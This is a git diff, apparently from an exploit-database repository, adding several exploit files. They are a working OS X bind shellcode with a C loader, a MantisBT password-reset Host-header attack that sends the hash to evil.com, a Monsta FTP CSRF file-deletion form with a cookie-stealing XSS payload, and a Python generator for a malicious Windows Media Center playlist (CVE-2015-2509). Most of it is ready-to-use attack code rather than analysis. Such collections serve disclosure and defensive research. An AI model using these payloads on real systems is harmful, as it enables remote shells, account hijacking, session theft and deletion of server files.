+and its team continues to identify and responsibly publish vulnerabilities
+in public and private software vendor's products. Members of the 
+Security-Assessment.com R&D team are globally recognised through their release
+of whitepapers and presentations related to new security research.
+
+For further information on this issue or any of our service offerings, 
+contact us:
+
+Web www.security-assessment.com
+Email info () security-assessment com
+Phone +64 4 470 1650
+
--- a/platforms/osx/shellcode/38126.c
+++ b/platforms/osx/shellcode/38126.c
@ -0,0 +1,122 @@
+;OS X x64, TCP bind shellcode (port 4444), NULL byte free, 144 bytes long
+;ASM code
+;compile:
+;nasm -f macho64 bind-shellcode.asm 
+;ld -macosx_version_min 10.7.0 -o bindsc bind-shellcode.o
+
+BITS 64
+
+global start
+
+section .text
+
+;Argument order: rdi, rsi, rdx, rcx
+
+
+start:
+	;socket
+	xor     rdi,rdi					;zero out RSI
+	mov     dil, 0x2				;AF_INET = 2
+	xor     rsi,rsi					;zero out RSI
+	mov     sil, 0x1				;SOCK_STREAM = 1
+	xor     rdx, rdx				;protocol = IP = 0
+	
+	;store syscall number on RAX
+	xor     rax,rax					;zero out RAX
+	mov     al,2					;put 2 to AL -> RAX = 0x0000000000000002
+	ror     rax, 0x28				;rotate the 2 -> RAX = 0x0000000002000000
+	mov     al,0x61					;move 3b to AL (execve socket#) -> RAX = 0x0000000002000061
+	mov		r12, rax				;save RAX
+    syscall							;trigger syscall
+    
+    ;bind
+    mov		r9, rax					;save socket number
+    mov 	rdi, rax				;put return value to RDI int socket
+    xor		rsi, rsi				;zero out RSI
+    push	rsi						;push RSI to the stack
+    mov		esi, 0x5c110201			;port number 4444 (=0x115c)
+    sub		esi,1					;make ESI=0x5c110200
+    push	rsi						;push RSI to the stack
+    mov 	rsi, rsp				;store address
+    mov		dl,0x10					;length of socket structure 0x10
+    add		r12b, 0x7				;RAX = 0x0000000002000068 bind
+    mov		rax, r12				;restore RAX
+    syscall
+    
+    ;listen
+    ;RDI already contains the socket number
+    xor		rsi, rsi				;zero out RSI
+	inc		rsi						;backlog = 1
+    add		r12b, 0x2				;RAX = 0x000000000200006a listen
+    mov		rax, r12				;restore RAX
+    syscall
+    
+    ;accept 30	AUE_ACCEPT	ALL	{ int accept(int s, caddr_t name, socklen_t	*anamelen); } 
+    ;RDI already contains the socket number
+    xor		rsi, rsi				;zero out RSI
+	;RDX is already zero
+    sub		r12b, 0x4c				;RAX = 0x000000000200001e accept
+    mov		rax, r12				;restore RAX
+    syscall
+    
+    ;int dup2(u_int from, u_int to); 
+	mov		rdi, rax
+	xor		rsi, rsi
+	add		r12b, 0x3c				;RAX = 0x000000000200005a dup2
+    mov		rax, r12				;restore RAX
+    syscall
+
+/*
+$ nasm -f bin bind-shellcode.asm 
+$ hexdump bind-shellcode
+0000000 48 31 ff 40 b7 02 48 31 f6 40 b6 01 48 31 d2 48
+0000010 31 c0 b0 02 48 c1 c8 28 b0 61 49 89 c4 0f 05 49
+0000020 89 c1 48 89 c7 48 31 f6 56 be 01 02 11 5c 83 ee
+0000030 01 56 48 89 e6 b2 10 41 80 c4 07 4c 89 e0 0f 05
+0000040 48 31 f6 48 ff c6 41 80 c4 02 4c 89 e0 0f 05 48
+0000050 31 f6 41 80 ec 4c 4c 89 e0 0f 05 48 89 c7 48 31
+0000060 f6 41 80 c4 3c 4c 89 e0 0f 05 48 ff c6 4c 89 e0
+0000070 0f 05 48 31 f6 56 48 bf 2f 2f 62 69 6e 2f 73 68
+0000080 57 48 89 e7 48 31 d2 41 80 ec 1f 4c 89 e0 0f 05
+0000090
+*/
+
+//C code
+//compile:
+//gcc bind-shellcode.c -o bindsc
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+ 
+int (*sc)();
+ 
+char shellcode[] =
+"\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2\x48" \
+"\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x61\x49\x89\xc4\x0f\x05\x49" \
+"\x89\xc1\x48\x89\xc7\x48\x31\xf6\x56\xbe\x01\x02\x11\x5c\x83\xee" \
+"\x01\x56\x48\x89\xe6\xb2\x10\x41\x80\xc4\x07\x4c\x89\xe0\x0f\x05" \
+"\x48\x31\xf6\x48\xff\xc6\x41\x80\xc4\x02\x4c\x89\xe0\x0f\x05\x48" \
+"\x31\xf6\x41\x80\xec\x4c\x4c\x89\xe0\x0f\x05\x48\x89\xc7\x48\x31" \
+"\xf6\x41\x80\xc4\x3c\x4c\x89\xe0\x0f\x05\x48\xff\xc6\x4c\x89\xe0" \
+"\x0f\x05\x48\x31\xf6\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" \
+"\x57\x48\x89\xe7\x48\x31\xd2\x41\x80\xec\x1f\x4c\x89\xe0\x0f\x05";
+ 
+int main(int argc, char **argv) {
+ 
+    void *ptr = mmap(0, 0x90, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON
+            | MAP_PRIVATE, -1, 0);
+ 
+    if (ptr == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+ 
+    memcpy(ptr, shellcode, sizeof(shellcode));
+    sc = ptr;
+ 
+    sc();
+ 
+    return 0;
+}
--- a/platforms/php/webapps/38068.txt
+++ b/platforms/php/webapps/38068.txt
@ -0,0 +1,86 @@
+# Exploit Title: MantisBT 1.2.19 - Host header attack vulnerability
+# Date: 07-09-2015
+# Exploit Author: Pier-Luc Maltais
+				  Centre opérationnel de sécurité informatique gouvernemental (COSIG)
+# Vendor Homepage: https://www.mantisbt.org/
+# Software Link: http://sourceforge.net/projects/mantisbt/files/mantis-stable/
+# Version: 1.2.19
+# Contact: https://twitter.com/plmaltais
+		   http://plmsecurity.net/mantis_host_header_attack
+
+==========================
+Vulnerability Description:
+==========================
+
+MantisBT 1.2.19 is vulnerable to an Host header attack that can
+be exploited by an unauthenticated user to hijack another user account.
+ 
+==================
+Technical Details:
+==================
+
+This exploit use the Host header attack to poison the link in the
+password reset mail. You need to know the victim username and 
+e-mail. You also need a remote host that you control to catch the 
+verification hash needed for password reset.
+
+1.  Access the password reset feature and fill the form with the
+    victim username and e-mail.
+
+    http://{VULNERABLE_MANTIS}/mantisbt/lost_pwd_page.php
+
+2.  Using an intercepting proxy like Burp, change the Host header 
+    with your evil host.
+
+    Original request :
+    
+    POST /mantisbt/lost_pwd_page.php HTTP/1.1
+    Host : {VULNERABLE_MANTIS}
+    [...]
+    
+    Modified request : 
+    
+    POST /mantisbt/lost_pwd_page.php HTTP/1.1
+    Host : evil.com
+    [...]
+    
+3.  When the user receive the e-mail, the link is poisoned with 
+    the evil host.
+
+    [...]
+    visit the following URL to change your password: 
+    http://evil.com/mantisbt/verify.php?id=1&confirm_hash=81ece020dfcd6d53e02c5323583cdead 
+    [...]
+    
+4.  Now, when the victim click on the link to reset his password,
+    his verification hash will be sent to our evil host. All we 
+    have to do is access the verify.php page with his hash, so
+    we can change his password and hijack his account.
+    
+    http://{VULNERABLE_MANTIS}/mantisbt/verify.php?id=1&confirm_hash=81ece020dfcd6d53e02c5323583cdead 
+ 
+=========
+Solution:
+=========
+
+Use 
+$_SERVER['SERVER_NAME'] (server controlled) 
+instead of 
+$_SERVER['HTTP_HOST'] (client controlled)
+ 
+====================
+Disclosure Timeline:
+====================
+
+16/02/2015 - Found the vulnerability
+17/02/2015 - Wrote this advisory
+17/02/2015 - Contacted developers on MantisBT forum
+18/02/2015 - Opened an issue in the bug tracker
+01/09/2015 - Still not patched, releasing this advisory.
+ 
+===========
+References:
+===========
+
+[1] http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html
+[2] http://stackoverflow.com/questions/2297403/http-host-vs-server-name/2297421#2297421
--- a/platforms/php/webapps/38148.txt
+++ b/platforms/php/webapps/38148.txt
@ -0,0 +1,139 @@
+# Exploit Title: CSRF XSS Monsta FTP
+# Google Dork: intitle: Monsta FTP CSRF / XSS
+# Date: 2015-09-11
+# Exploit Author:   hyp3rlinx
+# Website: hyp3rlinx.altervista.org
+# Vendor Homepage: www.monstaftp.com
+# Software Link:  www.monstaftp.com
+# Version: monsta_ftp_v1.6.2
+# Tested on: windows 7 SP1 XAMPP
+# Category: WebApps
+
+
+Vendor:
+================================
+www.monstaftp.com
+
+
+
+Product:
+================================
+monsta_ftp_v1.6.2
+Monsta FTP is open source PHP/Ajax cloudware browser based
+FTP file management web application.
+
+
+Vulnerability Type:
+===================
+CSRF / XSS
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+
+Vulnerability Details:
+=====================
+
+CSRF:
+-----
+No CSRF token exists when making some POST requests, allowing arbitrary
+deletion of files on the monstaftp server dirs.
+
+
+XSS:
+----
+
+Monstaftp sanitizes most $_GET requests with call to sanitizeStr() e.g -->
+echo sanitizeStr($ftp_host),
+However we find vulnerable code that is not santized on line 494 of
+ index.php --->  echo $_GET["openFolder"];
+creating an XSS entry point and will execute when victim accesses the
+Monstaftp login page before logging in.
+
+
+
+Exploit code(s):
+===============
+
+1) CSRF delete all server files
+
+<body onLoad="doit()">
+
+<script>
+function doit(){
+var e=document.getElementById('HELL')
+e.submit()
+}
+
+<form id="HELL"  action="http://localhost/monsta_ftp_v1.6.2_install/?"
+method="post">
+<input type="text" id="ftpAction"  name="ftpAction" value="delete"/>
+<input type="text" id="folderAction[]"  name="folderAction[]" value=""/>
+<input type="text" id="fileAction[]"  name="fileAction[]"
+value="~%2FSOMEFILES_TO_DELETE.php"/>
+</form>
+
+
+
+2) XSS steal PHP session ID: e.g. "PHPSESSID=7lukgqaghuqihnbj3ikcrsc715"
+
+Logout, then access the following URL before login and BOOOOOOM!.
+http://localhost/monsta_ftp_v1.6.2_install/?openFolder="/><script>alert('XSS
+by hyp3rlinx '%2bdocument.cookie)</script>
+
+
+
+Disclosure Timeline:
+=========================================================
+Vendor Notification:  NA
+Sept 11, 2015  : Public Disclosure
+
+
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+
+Severity Level:
+=========================================================
+Med
+
+
+
+Description:
+==========================================================
+
+
+Request Method(s):              [+]  POST & GET
+
+
+Vulnerable Product:             [+]  monsta_ftp_v1.6.2
+
+
+Vulnerable Parameter(s):        [+] ftpAction, fileAction[], openFolder
+
+
+Affected Area(s):               [+] FTP Admin Area
+
+
+===========================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+by hyp3rlinx
--- a/platforms/windows/local/38147.pl
+++ b/platforms/windows/local/38147.pl
--- a/platforms/windows/remote/38151.py
+++ b/platforms/windows/remote/38151.py
@ -0,0 +1,22 @@
+# Title: MS15-100 Windows Media Center Command Execution
+# Date : 11/09/2015
+# Author: R-73eN
+# Software: Windows Media Center
+# Tested : Windows 7 Ultimate
+# CVE : 2015-2509
+
+
+banner = ""
+banner += " ___        __        ____                 _    _  \n" 
+banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
+banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
+banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
+banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
+print banner
+
+command = "calc.exe"
+evil = '<application run="' + command + '"/>'
+f = open("Music.mcl","w")
+f.write(evil)
+f.close()
+print "\n[+] Music.mcl generated . . . [+]"